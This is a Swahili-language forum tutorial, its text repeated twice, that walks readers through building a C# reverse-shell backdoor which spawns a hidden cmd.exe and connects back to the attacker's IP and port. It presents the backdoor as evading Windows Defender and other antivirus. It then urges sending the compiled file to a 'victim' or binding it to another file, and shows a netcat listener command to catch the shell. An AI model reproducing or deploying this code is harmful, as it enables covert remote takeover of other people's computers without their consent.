Thefreedom
JF-Expert Member
- Jan 27, 2019
- 319
- 316
hey friend Thefreedom is here...
katika previous parts yani part 1 na 2 tulichek jinsi ya ku comprimize systems kwa kutumia netcat backdoor in deeper . Na tulifanikiwa check vitu vinavyofanyika na kutembea bila ttzo
leo sasa nimalizie tu kuwaonesha jinsi gani ya ku bypass almost all type of antivirus ikiwemo windows defender by microsoft na updates zake zoteeeeee atakzotoa ...this shit haiwez kuwa detected kutokana na muundo wa codes ambazo hata wee kama una elimu na c# na c++ programming unaweza ongezea ili jamviiii.
tusipige bra bra nyingi.............................LETS START
usisahau kutu follow na kutusikiliza katika project zetu as cyberknwtz here http://sowernal.com/IkH
REQUIREMENTS
1. ur pc
2. visual studio Download http://sowernal.com/IsD
3. source of codes ya hii project unaweza download hapa http://sowernal.com/J8p au copy hapo chini .
NOTE . VISUAL STUDIO YAKO INATAKIWA KUWA NA PACKAGE TOOL HIZO NILIZOTILIA TIC KWENYE PICHA HAPO CHINI
baada ya fungua new project na platform ya project chagua CONSOLE APP (.NET framework)
baada ya hapo ukifungua utakuta vicodes futa hakikisha uwe na blank page ya kuandika codes zako .
kisha paste hizi codes hapa chini
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient("WEKA IP YAKO", WEKA PORT))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
Note using(TcpClient client = new TcpClient("WEKA IP YAKO", WEKA PORT)) hio sehemu hakikisha unaweka ip yako na port ambayo iko forwaded
nashauri tumia router au tumia portmap.io kama unataka stable connection
baada ya hapo save alafu nenda juu kule ka build solution
utaenda sehemu ulipo save utakuta backdoor yako.
hapo unaweza mtumia victim au ukabind na kumtumia victim wakoooo , sorry siwez funz kubind kwasabbu nimeshaonesha sana kwenye my previous posts .
soon huyo mtu akiiinstalll Atakuwa hacked 100% pamoja ana antivirus wakaliiiii
ukiscann na windows defender utakuta majibu kama haya
sasa kwako uta feel connection kwenye kali linux yako as attacker machine kwa kuandika
nc -l -p weka port ambayo uliweka kwenye backdoor ile mfano
nc -l -p 3000
WE ARE IN............................................
thanks
Thefreedom
katika previous parts yani part 1 na 2 tulichek jinsi ya ku comprimize systems kwa kutumia netcat backdoor in deeper . Na tulifanikiwa check vitu vinavyofanyika na kutembea bila ttzo
leo sasa nimalizie tu kuwaonesha jinsi gani ya ku bypass almost all type of antivirus ikiwemo windows defender by microsoft na updates zake zoteeeeee atakzotoa ...this shit haiwez kuwa detected kutokana na muundo wa codes ambazo hata wee kama una elimu na c# na c++ programming unaweza ongezea ili jamviiii.
tusipige bra bra nyingi.............................LETS START
usisahau kutu follow na kutusikiliza katika project zetu as cyberknwtz here http://sowernal.com/IkH
REQUIREMENTS
1. ur pc
2. visual studio Download http://sowernal.com/IsD
3. source of codes ya hii project unaweza download hapa http://sowernal.com/J8p au copy hapo chini .
NOTE . VISUAL STUDIO YAKO INATAKIWA KUWA NA PACKAGE TOOL HIZO NILIZOTILIA TIC KWENYE PICHA HAPO CHINI
baada ya fungua new project na platform ya project chagua CONSOLE APP (.NET framework)
baada ya hapo ukifungua utakuta vicodes futa hakikisha uwe na blank page ya kuandika codes zako .
kisha paste hizi codes hapa chini
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient("WEKA IP YAKO", WEKA PORT))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
Note using(TcpClient client = new TcpClient("WEKA IP YAKO", WEKA PORT)) hio sehemu hakikisha unaweka ip yako na port ambayo iko forwaded
nashauri tumia router au tumia portmap.io kama unataka stable connection
baada ya hapo save alafu nenda juu kule ka build solution
utaenda sehemu ulipo save utakuta backdoor yako.
hapo unaweza mtumia victim au ukabind na kumtumia victim wakoooo , sorry siwez funz kubind kwasabbu nimeshaonesha sana kwenye my previous posts .
soon huyo mtu akiiinstalll Atakuwa hacked 100% pamoja ana antivirus wakaliiiii
ukiscann na windows defender utakuta majibu kama haya
sasa kwako uta feel connection kwenye kali linux yako as attacker machine kwa kuandika
nc -l -p weka port ambayo uliweka kwenye backdoor ile mfano
nc -l -p 3000
WE ARE IN............................................
thanks
Thefreedom
